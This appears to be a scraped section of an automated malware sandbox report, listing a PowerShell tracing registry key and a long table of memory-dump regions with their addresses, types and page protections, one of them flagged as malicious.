HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 74 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
95D0000
trusted library section
page read and write
 malicious
47B000
heap
page read and write
A70000
remote allocation
page read and write
107A000
stack
page read and write
1AE000
heap
page read and write
317000
heap
page read and write
938000
heap
page read and write
3871000
heap
page read and write
4ABE000
stack
page read and write
7DE000
stack
page read and write | page guard
1D0000
trusted library allocation
page read and write
928000
heap
page read and write
E3D1000
trusted library allocation
page read and write
19D000
trusted library allocation
page execute and read and write
497F000
stack
page read and write
3B8F000
stack
page read and write
3B3000
heap
page read and write
360000
heap
page read and write
44F0000
heap
page read and write
3EE000
heap
page read and write
3962000
heap
page read and write
CFF000
stack
page read and write
83E000
stack
page read and write
250000
trusted library allocation
page execute and read and write
478000
heap
page read and write
396000
heap
page read and write
26C3000
trusted library allocation
page read and write
3B4000
heap
page read and write
3ECC000
heap
page read and write
2681000
trusted library allocation
page read and write
37E9000
trusted library allocation
page read and write
10000
heap
page read and write
296000
heap
page read and write
970000
trusted library allocation
page read and write
630E000
stack
page read and write
2DBF000
stack
page read and write
3CF0000
heap
page read and write
4BEE000
stack
page read and write
2B8F000
stack
page read and write
4CAA000
heap
page read and write
200000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
4CBE000
stack
page read and write
3C9000
heap
page read and write
4BF7000
heap
page read and write
118E000
stack
page read and write
15D000
heap
page read and write
DA0000
trusted library allocation
page read and write
870000
heap
page read and write
44D0000
trusted library allocation
page read and write
36E000
stack
page read and write
ACE000
stack
page read and write
3B0000
heap
page read and write
2DF000
heap
page read and write
394A000
heap
page read and write
44D0000
trusted library allocation
page read and write
C70000
trusted library allocation
page read and write
39AC000
stack
page read and write
230000
trusted library allocation
page read and write
18A000
stack
page read and write
DA0000
trusted library allocation
page read and write
3F3C000
heap
page read and write
368E000
stack
page read and write
4FA0000
heap
page read and write
1ECD000
stack
page read and write
4AFE000
stack
page read and write
4490000
heap
page read and write
938000
heap
page read and write
3771000
heap
page read and write
71A000
heap
page read and write
F20000
trusted library allocation
page read and write
28ED000
trusted library allocation
page read and write
65D1000
trusted library allocation
page read and write
710000
heap
page read and write
4BBE000
stack
page read and write
5F6E000
stack
page read and write
4D37000
heap
page read and write
3CF5000
heap
page read and write
7CE000
stack
page read and write
3F62000
heap
page read and write
3CA000
heap
page read and write
46C000
stack
page read and write
40CF000
stack
page read and write
45B000
heap
page read and write
E7F000
stack
page read and write
47E000
heap
page read and write
1F0000
trusted library allocation
page read and write
295E000
trusted library allocation
page read and write
32F000
heap
page read and write
5D24000
heap
page read and write
268000
heap
page read and write
2BF0000
heap
page read and write
31BC000
stack
page read and write
28F000
stack
page read and write
5DE0000
heap
page read and write
5CBE000
stack
page read and write
23C000
stack
page read and write
2942000
trusted library allocation
page read and write
260000
heap
page execute and read and write
270000
heap
page read and write
3CC000
heap
page read and write
BFD1000
trusted library allocation
page read and write
47D000
heap
page read and write
4BE000
stack
page read and write | page guard
4CF000
heap
page read and write
474000
heap
page read and write
280000
trusted library allocation
page read and write
3AC000
heap
page read and write
4CC000
heap
page read and write
3947000
heap
page read and write
C60000
trusted library allocation
page read and write
2B06000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
3564000
heap
page read and write
3D00000
heap
page read and write
DCE000
stack
page read and write
289C000
trusted library allocation
page read and write
29D000
heap
page read and write
1CC0000
heap
page read and write
5040000
heap
page read and write
251E000
stack
page read and write
1F3000
trusted library allocation
page execute and read and write
2988000
trusted library allocation
page read and write
CFE000
stack
page read and write | page guard
D80000
trusted library allocation
page read and write
1F79000
heap
page read and write
3F3C000
stack
page read and write
120000
heap
page read and write
3DC000
heap
page read and write
3A0000
heap
page read and write
28E5000
trusted library allocation
page read and write
EB0000
trusted library allocation
page execute and read and write
194000
trusted library allocation
page read and write
10000
heap
page read and write
427000
heap
page read and write
48A000
stack
page read and write
923000
heap
page read and write
1E8F000
stack
page read and write
6370000
heap
page read and write
965000
heap
page read and write
29A2000
trusted library allocation
page read and write
4CF000
heap
page read and write
4CF000
heap
page read and write
3BE000
heap
page read and write
410000
trusted library allocation
page read and write
1AB000
heap
page read and write
3889000
heap
page read and write
1FB9000
heap
page read and write
3DC000
heap
page read and write
1A8000
heap
page read and write
B12000
heap
page read and write
267000
stack
page read and write
4D20000
heap
page read and write
47E000
heap
page read and write
3F62000
heap
page read and write
1F74000
heap
page read and write
4D20000
heap
page read and write
880000
trusted library allocation
page execute and read and write
3830000
heap
page read and write
1E0000
heap
page read and write
6020000
heap
page read and write
4D37000
heap
page read and write
44F1000
heap
page read and write
3CA000
heap
page read and write
30B000
heap
page read and write
50AF000
heap
page read and write
374F000
stack
page read and write
64F000
heap
page read and write
1A7000
heap
page read and write
4E8E000
stack
page read and write | page guard
384D000
heap
page read and write
3D9000
heap
page read and write
486000
stack
page read and write
647000
heap
page read and write
366F000
stack
page read and write
180000
trusted library allocation
page read and write
6381000
heap
page read and write
3A7000
heap
page read and write
3949000
heap
page read and write
1AB000
heap
page read and write
2961000
trusted library allocation
page read and write
880000
heap
page read and write
3BCF000
stack
page read and write
5C9000
heap
page read and write
4E1E000
stack
page read and write
1FAB000
heap
page read and write
289A000
trusted library allocation
page read and write
965000
heap
page read and write
1FA1000
heap
page read and write
4A0E000
unkown
page read and write
4CF000
heap
page read and write
C80000
trusted library allocation
page read and write
5E7E000
stack
page read and write
10BE000
stack
page read and write
708000
heap
page read and write
190000
trusted library allocation
page read and write
1A4000
heap
page read and write
499F000
stack
page read and write
3874000
heap
page read and write
4FE6000
heap
page read and write
2EB7000
heap
page read and write
34C000
heap
page read and write
238F000
stack
page read and write
3F49000
heap
page read and write
638000
heap
page read and write
4ED4000
heap
page read and write
6D0000
trusted library allocation
page read and write
DC0000
trusted library allocation
page read and write
CFD1000
trusted library allocation
page read and write
1FB9000
heap
page read and write
8A0000
trusted library allocation
page read and write
4D1B000
heap
page read and write
3ED0000
heap
page read and write
40F000
heap
page read and write
AF4000
heap
page read and write
3681000
trusted library allocation
page read and write
2944000
trusted library allocation
page read and write
23E0000
heap
page read and write
2F7000
heap
page read and write
398000
heap
page read and write
3EB0000
heap
page read and write
59F000
heap
page read and write
3A2000
heap
page read and write
DD0000
trusted library allocation
page read and write
47B000
heap
page read and write
3A3000
heap
page read and write
3944000
heap
page read and write
4D37000
heap
page read and write
4A3B000
stack
page read and write
2A0000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
4C0E000
heap
page read and write
2E0000
trusted library allocation
page read and write
26A000
heap
page read and write
3962000
heap
page read and write
E2C000
stack
page read and write
385F000
heap
page read and write
3CF000
heap
page read and write
3230000
trusted library allocation
page read and write
1F30000
heap
page read and write
4C6E000
stack
page read and write
456000
heap
page read and write
36A9000
trusted library allocation
page read and write
56D000
heap
page read and write
3E3F000
stack
page read and write
E5C000
stack
page read and write
E80000
trusted library allocation
page execute and read and write
4C8000
heap
page read and write
928000
heap
page read and write
D40000
trusted library allocation
page read and write
1F6E000
heap
page read and write
36A9000
trusted library allocation
page read and write
412000
heap
page read and write
2A0000
heap
page read and write
E80000
trusted library allocation
page execute and read and write
4EA0000
heap
page read and write
2A2000
heap
page read and write
4E90000
heap
page read and write
EFE000
stack
page read and write
1010000
trusted library allocation
page read and write
49AE000
stack
page read and write
4D0F000
heap
page read and write
44D0000
trusted library allocation
page read and write
3944000
heap
page read and write
39A000
heap
page read and write
5E9E000
stack
page read and write
1FD000
trusted library allocation
page execute and read and write
47B000
heap
page read and write
388A000
heap
page read and write
2A4B000
trusted library allocation
page read and write
266000
heap
page read and write
2730000
heap
page read and write
27BB000
trusted library allocation
page read and write
76A000
trusted library allocation
page read and write
4C0D000
heap
page read and write
3C6D000
stack
page read and write
92A000
heap
page read and write
3870000
heap
page read and write
3D8000
heap
page read and write
4D0F000
heap
page read and write
6FD1000
trusted library allocation
page read and write
A6E000
stack
page read and write
27B000
heap
page read and write
22A000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
5131000
heap
page read and write
770000
trusted library allocation
page execute and read and write
392000
heap
page read and write
5FC000
heap
page read and write
1F71000
heap
page read and write
49DE000
stack
page read and write
DE0000
heap
page execute and read and write
3F62000
heap
page read and write
945000
heap
page read and write
C00000
trusted library allocation
page read and write
127000
heap
page read and write
2BF8000
heap
page read and write
115000
heap
page read and write
EE000
heap
page read and write
C5E000
stack
page read and write
2A8E000
stack
page read and write
B7000
heap
page read and write
7F0000
trusted library allocation
page read and write
3231000
trusted library allocation
page read and write
112E000
stack
page read and write
4CF000
heap
page read and write
2196000
heap
page read and write
5AE000
heap
page read and write
D8E000
stack
page read and write
420C000
stack
page read and write
31A000
heap
page read and write
3770000
heap
page read and write
51A4000
heap
page read and write
326000
heap
page read and write
34F000
heap
page read and write
3F49000
heap
page read and write
3C7000
heap
page read and write
CA0000
trusted library allocation
page read and write
240000
heap
page read and write
38A2000
heap
page read and write
390000
heap
page read and write
F5E000
trusted library allocation
page read and write
3A70000
heap
page read and write
351000
heap
page read and write
303000
trusted library allocation
page read and write
10000
heap
page read and write
506000
heap
page read and write
1F4000
trusted library allocation
page read and write
4C6F000
stack
page read and write
61E000
stack
page read and write
477000
heap
page read and write
3E5000
heap
page read and write
1F92000
heap
page read and write
285000
trusted library allocation
page execute and read and write
1E6F000
stack
page read and write
4E8F000
stack
page read and write
26F0000
heap
page read and write
3576000
heap
page read and write
3232000
trusted library allocation
page read and write
282000
heap
page read and write
38A2000
heap
page read and write
345000
heap
page read and write
4E0E000
stack
page read and write
94B000
heap
page read and write
109000
heap
page read and write
648A000
trusted library allocation
page read and write
515E000
heap
page read and write
44D0000
trusted library allocation
page read and write
49EE000
stack
page read and write
D9B000
stack
page read and write
2963000
trusted library allocation
page read and write
3F22000
heap
page read and write
5DCF000
stack
page read and write
4D0E000
heap
page read and write
2681000
trusted library allocation
page read and write
4D36000
heap
page read and write
44D0000
trusted library allocation
page read and write
307000
heap
page read and write
42A000
heap
page read and write
4B60000
heap
page read and write
44D0000
trusted library allocation
page read and write
4BF000
stack
page read and write
4C4000
heap
page read and write
3931000
heap
page read and write
299000
heap
page read and write
4DCE000
stack
page read and write
30E000
heap
page read and write
4B5D000
stack
page read and write
25DF000
stack
page read and write
3941000
heap
page read and write
3934000
heap
page read and write
4A6E000
stack
page read and write
4ADB000
stack
page read and write
3DED000
stack
page read and write
3924000
heap
page read and write
51C2000
heap
page read and write
325000
heap
page read and write
380000
heap
page read and write
A70000
remote allocation
page read and write
923000
heap
page read and write
3F1F000
heap
page read and write
DE0000
trusted library allocation
page read and write
7DF000
stack
page read and write
4C8D000
heap
page read and write
43B000
heap
page read and write
5A0000
trusted library allocation
page read and write
38A2000
heap
page read and write
F70000
trusted library allocation
page read and write
4D9000
heap
page read and write
413F000
stack
page read and write
1A8000
heap
page read and write
2A2000
trusted library allocation
page read and write
945000
heap
page read and write
3891000
heap
page read and write
965000
heap
page read and write
1F9F000
stack
page read and write
4D31000
heap
page read and write
3F49000
heap
page read and write
37D0000
trusted library allocation
page read and write
2C0000
heap
page read and write
30F0000
heap
page read and write
3CF9000
heap
page read and write
330000
heap
page execute and read and write
1F50000
heap
page read and write
CE0000
trusted library allocation
page read and write
B40000
heap
page read and write
4C6F000
heap
page read and write
205000
trusted library allocation
page execute and read and write
4D1B000
heap
page read and write
38A2000
heap
page read and write
26C3000
trusted library allocation
page read and write
3E8000
heap
page read and write
4A3E000
stack
page read and write
3235000
trusted library allocation
page read and write
43DC000
stack
page read and write
4DAD000
stack
page read and write
622E000
stack
page read and write
4BA1000
heap
page read and write
840000
heap
page read and write
5DE4000
heap
page read and write
300000
trusted library allocation
page read and write
84EF000
trusted library allocation
page read and write
7D0000
trusted library allocation
page read and write
74D5000
trusted library allocation
page read and write
287000
stack
page read and write
2FA000
heap
page read and write
44D0000
trusted library allocation
page read and write
3F42000
heap
page read and write
1CD0000
heap
page read and write
396E000
stack
page read and write
26C4000
trusted library allocation
page read and write
8CB000
heap
page read and write
760000
trusted library allocation
page read and write
2BCD000
stack
page read and write
3962000
heap
page read and write
938000
heap
page read and write
21CF000
stack
page read and write
3F1F000
heap
page read and write
287000
heap
page read and write
5E9000
heap
page read and write
A1E000
stack
page read and write
B5D1000
trusted library allocation
page read and write
2560000
heap
page read and write
370000
trusted library allocation
page read and write
5A9000
trusted library allocation
page read and write
517E000
stack
page read and write
276000
heap
page read and write
36A9000
trusted library allocation
page read and write
28DB000
trusted library allocation
page read and write
3C4000
heap
page read and write
44D0000
trusted library allocation
page read and write
640000
heap
page read and write
928000
heap
page read and write
242000
trusted library allocation
page read and write
85D1000
trusted library allocation
page read and write
1CD5000
heap
page read and write
478000
heap
page read and write
94B000
heap
page read and write
4D20000
heap
page read and write
394F000
heap
page read and write
10000
heap
page read and write
44D0000
trusted library allocation
page read and write
3A79000
heap
page read and write
DF0000
trusted library allocation
page read and write
3F2F000
heap
page read and write
1F71000
heap
page read and write
4CF000
heap
page read and write
37DD000
stack
page read and write
643000
heap
page read and write
938000
heap
page read and write
1AE000
heap
page read and write
4770000
trusted library allocation
page read and write
E96000
heap
page execute and read and write
1CC5000
heap
page read and write
3A72000
heap
page read and write
FF000
heap
page read and write
5080000
heap
page read and write
45F000
heap
page read and write
644E000
trusted library allocation
page read and write
268000
heap
page read and write
6CD000
stack
page read and write
20000
heap
page read and write
10DE000
stack
page read and write
4D1B000
heap
page read and write
49AE000
stack
page read and write
1F6D000
heap
page read and write
894000
heap
page read and write
700000
heap
page read and write
10C000
heap
page read and write
760000
trusted library allocation
page read and write
3B31000
heap
page read and write
26E3000
trusted library allocation
page read and write
2F30000
heap
page read and write
2A7E000
trusted library allocation
page read and write
45F000
heap
page read and write
27BA000
trusted library allocation
page read and write
5A2000
heap
page read and write
10C000
heap
page read and write
577000
heap
page read and write
3F19000
heap
page read and write
64ED000
trusted library allocation
page read and write
3D0000
heap
page read and write
2BF4000
heap
page read and write
3B8000
heap
page read and write
645000
heap
page read and write
C10000
trusted library allocation
page read and write
290F000
stack
page read and write
4EDE000
stack
page read and write
BEE000
stack
page read and write
C90000
trusted library allocation
page read and write
6F0000
trusted library allocation
page read and write
5D6F000
stack
page read and write
340000
heap
page read and write
2520000
heap
page read and write
3B30000
heap
page read and write
923000
heap
page read and write
45F000
heap
page read and write
515F000
stack
page read and write
2A21000
trusted library allocation
page read and write
945000
heap
page read and write
E9C000
stack
page read and write
8B0000
heap
page read and write
47A000
heap
page read and write
214000
trusted library allocation
page read and write
89000
stack
page read and write
24DC000
heap
page read and write
470000
trusted library allocation
page read and write
423F000
stack
page read and write
5C0000
trusted library allocation
page read and write
30000
heap
page read and write
1FB9000
heap
page read and write
118000
heap
page read and write
1AB000
heap
page read and write
C0000
heap
page read and write
1F72000
heap
page read and write
938000
heap
page read and write
E90000
heap
page execute and read and write
44D0000
trusted library allocation
page read and write
92A000
heap
page read and write
780000
trusted library allocation
page read and write
2942000
trusted library allocation
page read and write
1F7C000
heap
page read and write
3BF000
heap
page read and write
B47000
heap
page read and write
108E000
stack
page read and write
287F000
stack
page read and write
D40000
trusted library allocation
page read and write
644000
heap
page read and write
3962000
heap
page read and write
36A6000
heap
page read and write
5E02000
heap
page read and write
4FAA000
heap
page read and write
3884000
heap
page read and write
4BA0000
heap
page read and write
75D1000
trusted library allocation
page read and write
2681000
trusted library allocation
page read and write
17B000
heap
page read and write
1CFB000
heap
page read and write
2BE000
heap
page read and write
24DC000
heap
page read and write
60D0000
heap
page read and write
10C000
heap
page read and write
4D37000
heap
page read and write
3A71000
heap
page read and write
4C1E000
stack
page read and write
26D000
heap
page read and write
3690000
trusted library allocation
page read and write
3C9000
heap
page read and write
3EB000
heap
page read and write
2CBE000
stack
page read and write
4770000
trusted library allocation
page read and write
1BA000
stack
page read and write
4CA0000
heap
page read and write
3F30000
heap
page read and write
31F0000
heap
page read and write
2E0000
trusted library allocation
page read and write
570000
heap
page read and write
230000
heap
page read and write
3E00000
heap
page read and write
3C9000
heap
page read and write
4D18000
heap
page read and write
3920000
heap
page read and write
8FD1000
trusted library allocation
page read and write
7E0000
trusted library allocation
page read and write
3F62000
heap
page read and write
3F64000
heap
page read and write
39D0000
heap
page read and write
20000
heap
page read and write
DD0000
trusted library allocation
page execute and read and write
3E09000
heap
page read and write
3AB000
heap
page read and write
1AA000
heap
page read and write
92E000
stack
page read and write
2BFB000
heap
page read and write
44A000
heap
page read and write
4FCE000
stack
page read and write
877000
heap
page read and write
11DE000
stack
page read and write
2FC0000
heap
page read and write
47B000
heap
page read and write
4CB000
heap
page read and write
3F42000
heap
page read and write
F22000
trusted library allocation
page read and write
4E7E000
stack
page read and write | page guard
32ED000
trusted library allocation
page read and write
45F000
heap
page read and write
50FB000
heap
page read and write
3E1000
heap
page read and write
1B5000
stack
page read and write
3B39000
heap
page read and write
1FE000
stack
page read and write
394000
heap
page read and write
243F000
stack
page read and write
F4B000
stack
page read and write
5D20000
heap
page read and write
3DF000
heap
page read and write
4AEE000
unkown
page read and write
4CF000
heap
page read and write
1AB000
heap
page read and write
374000
heap
page read and write
299000
heap
page read and write
1F8A000
heap
page read and write
2982000
trusted library allocation
page read and write
2A5000
trusted library allocation
page execute and read and write
7E0000
trusted library allocation
page read and write
51A0000
heap
page read and write
C5D1000
trusted library allocation
page read and write
2EA000
stack
page read and write
44D0000
heap
page read and write
2CD000
heap
page read and write
3C8F000
stack
page read and write
36CE000
stack
page read and write
1AE000
heap
page read and write
386C000
heap
page read and write
29A000
heap
page read and write
29D4000
trusted library allocation
page read and write
4E90000
heap
page read and write
1F94000
heap
page read and write
B0000
heap
page read and write
F51000
trusted library allocation
page read and write
1F8D000
heap
page read and write
3F21000
heap
page read and write
2D0000
trusted library allocation
page execute and read and write
D50000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
10000
heap
page read and write
386F000
heap
page read and write
1D0B000
heap
page read and write
3D2000
heap
page read and write
3F5F000
heap
page read and write
4D2C000
heap
page read and write
34F000
heap
page read and write
923000
heap
page read and write
945000
heap
page read and write
457F000
stack
page read and write
403D000
stack
page read and write
1F40000
direct allocation
page read and write
1FA000
trusted library allocation
page execute and read and write
26A3000
trusted library allocation
page read and write
3B4C000
stack
page read and write
8A6000
heap
page read and write
28D2000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
24B000
stack
page read and write
32B000
heap
page read and write
1F8D000
heap
page read and write
3BD000
heap
page read and write
29B1000
trusted library allocation
page read and write
750000
trusted library allocation
page execute and read and write
4770000
trusted library allocation
page read and write
3881000
heap
page read and write
213000
trusted library allocation
page execute and read and write
2160000
heap
page read and write
2B60000
trusted library allocation
page read and write
CB0000
trusted library allocation
page read and write
23E1000
heap
page read and write
4A9E000
stack
page read and write
344000
heap
page read and write
386C000
heap
page read and write
3D7000
heap
page read and write
309000
trusted library allocation
page read and write
35E000
stack
page read and write
5A3000
trusted library allocation
page read and write
FA000
heap
page read and write
11D0000
heap
page read and write
AF0000
heap
page read and write
946000
heap
page read and write
4E7F000
stack
page read and write
3681000
trusted library allocation
page read and write
3F1000
heap
page read and write
4F6D000
stack
page read and write
94B000
heap
page read and write
8DB000
heap
page read and write
4E9E000
stack
page read and write
5E3E000
stack
page read and write
2EB000
heap
page read and write
4D0E000
heap
page read and write
594000
heap
page read and write
24A000
trusted library allocation
page read and write
32F000
heap
page read and write
F8E000
stack
page read and write
3D9000
heap
page read and write
96E000
unkown
page read and write
710000
heap
page read and write
4D2C000
heap
page read and write
8EE000
stack
page read and write
47E000
heap
page read and write
F6A000
trusted library allocation
page read and write
5CEE000
stack
page read and write
4C0000
heap
page read and write
6492000
trusted library allocation
page read and write
476F000
stack
page read and write
D60000
trusted library allocation
page read and write
4CF000
heap
page read and write
299000
heap
page read and write
E30000
trusted library allocation
page read and write
E7E000
stack
page read and write
299000
heap
page read and write
47E000
heap
page read and write
4E6000
heap
page read and write
2A7000
trusted library allocation
page execute and read and write
CF0000
trusted library allocation
page read and write
4C91000
heap
page read and write
2E5000
stack
page read and write
502F000
stack
page read and write
50CE000
heap
page read and write
17B000
heap
page read and write
92A000
heap
page read and write
1FB9000
heap
page read and write
271E000
trusted library allocation
page read and write
5DFE000
stack
page read and write
CDD000
stack
page read and write
648E000
trusted library allocation
page read and write
F65000
trusted library allocation
page read and write
2B1000
heap
page read and write
29CF000
trusted library allocation
page read and write
3951000
heap
page read and write
D3D000
stack
page read and write
3DC000
heap
page read and write
3B32000
heap
page read and write
2A42000
trusted library allocation
page read and write
646000
heap
page read and write
2A9000
heap
page read and write
210000
trusted library allocation
page read and write
5C7E000
stack
page read and write
D9D1000
trusted library allocation
page read and write
389F000
stack
page read and write
3874000
heap
page read and write
41E9000
trusted library allocation
page read and write
1A8000
heap
page read and write
20000
heap
page read and write
E3D000
stack
page read and write
1F96000
heap
page read and write
3681000
trusted library allocation
page read and write
453000
heap
page read and write
1E8F000
stack
page read and write
44B000
heap
page read and write
28E9000
trusted library allocation
page read and write
1FB9000
heap
page read and write
3879000
heap
page read and write
300000
heap
page read and write
3B0D000
stack
page read and write
31A000
heap
page read and write
21D000
trusted library allocation
page execute and read and write
3B2F000
stack
page read and write
FC0000
heap
page execute and read and write
293000
heap
page read and write
220000
trusted library allocation
page read and write
4C0D000
heap
page read and write
2AF000
heap
page read and write
3689000
trusted library allocation
page read and write
C90000
trusted library allocation
page read and write
4D2E000
stack
page read and write
945000
heap
page read and write
3930000
heap
page read and write
3962000
heap
page read and write
92A000
heap
page read and write
240000
trusted library allocation
page read and write
3560000
heap
page read and write
1F0E000
stack
page read and write
478000
heap
page read and write
42D0000
heap
page read and write
10000
heap
page read and write
4D20000
heap
page read and write
636000
heap
page read and write
F00000
trusted library allocation
page execute and read and write
387000
heap
page read and write
27B000
heap
page read and write
3C9000
heap
page read and write
4C0000
heap
page read and write
3E70000
heap
page read and write
44D0000
trusted library allocation
page read and write
3B000
heap
page read and write
3560000
heap
page read and write
1020000
trusted library allocation
page read and write
3F43000
heap
page read and write
8A7000
heap
page read and write
282000
trusted library allocation
page read and write
BA0000
trusted library allocation
page read and write
299000
heap
page read and write
307000
trusted library allocation
page read and write
280F000
stack
page read and write
1DC000
stack
page read and write
447000
heap
page read and write
28E000
heap
page read and write
34F000
heap
page read and write
1AE000
heap
page read and write
50AC000
heap
page read and write
202000
trusted library allocation
page read and write
42B0000
heap
page read and write
398000
heap
page read and write
D00000
heap
page execute and read and write
D50000
trusted library allocation
page read and write
9533000
trusted library allocation
page read and write
34B000
heap
page read and write
1AA000
trusted library allocation
page read and write
7FD1000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
45F000
heap
page read and write
2923000
trusted library allocation
page read and write
4C8F000
stack
page read and write
240000
trusted library allocation
page read and write
5FEE000
stack
page read and write
3FAB000
heap
page read and write
370000
heap
page read and write
5F0E000
stack
page read and write
4D1E000
stack
page read and write
44D0000
trusted library allocation
page read and write
945000
heap
page read and write
323000
heap
page read and write
DB0000
trusted library allocation
page read and write
3E05000
heap
page read and write
20CC000
stack
page read and write
29E1000
trusted library allocation
page read and write
397E000
stack
page read and write
3939000
heap
page read and write
44D0000
trusted library allocation
page read and write
1EB000
stack
page read and write
D4F000
stack
page read and write
D90000
trusted library allocation
page read and write
2E2000
heap
page read and write
43E000
heap
page read and write
7E9000
trusted library allocation
page read and write
4F2E000
stack
page read and write
273000
heap
page read and write
3F47000
heap
page read and write
44D0000
trusted library allocation
page read and write
10000
heap
page read and write
4D13000
heap
page read and write
4BAD000
stack
page read and write
1AD000
heap
page read and write
4ED0000
heap
page read and write
193000
trusted library allocation
page execute and read and write
2D7000
stack
page read and write
890000
trusted library allocation
page read and write
113B000
stack
page read and write
2EF000
trusted library allocation
page read and write
5D0000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
5D42000
heap
page read and write
4D29000
heap
page read and write
384E000
stack
page read and write
2BB000
heap
page read and write
3C9000
heap
page read and write
648000
heap
page read and write
388F000
heap
page read and write
32F000
heap
page read and write
2900000
trusted library allocation
page read and write
4D24000
heap
page read and write
306E000
stack
page read and write
870000
trusted library allocation
page read and write
BF0000
trusted library allocation
page read and write
3F4B000
heap
page read and write
2EA0000
heap
page read and write
938000
heap
page read and write
EA0000
heap
page read and write
3670000
heap
page read and write
3FB000
heap
page read and write
3F62000
heap
page read and write
4D3D000
heap
page read and write
658000
heap
page read and write
150000
heap
page read and write
2B8000
trusted library allocation
page read and write
3BF0000
heap
page read and write
DEE000
stack
page read and write
965000
heap
page read and write
108000
heap
page read and write
39D000
heap
page read and write
8F5000
heap
page read and write
4C8C000
heap
page read and write
3233000
trusted library allocation
page read and write
266000
heap
page execute and read and write
38A2000
heap
page read and write
4D14000
heap
page read and write
4CB000
heap
page read and write
3F35000
heap
page read and write
44B000
heap
page read and write
5C0000
heap
page read and write
3234000
trusted library allocation
page read and write
4C73000
heap
page read and write
3C9000
heap
page read and write
4CF000
heap
page read and write
380000
trusted library allocation
page execute and read and write
513000
heap
page read and write
4CC000
heap
page read and write
4B4E000
stack
page read and write
60CF000
stack
page read and write
3F2F000
heap
page read and write
3CD000
heap
page read and write
639000
heap
page read and write
34F000
heap
page read and write
928000
heap
page read and write
30E000
heap
page read and write
3884000
heap
page read and write
64D000
heap
page read and write
3F37000
heap
page read and write
6E0000
trusted library allocation
page read and write
There are 907 hidden memdumps, click here to show them.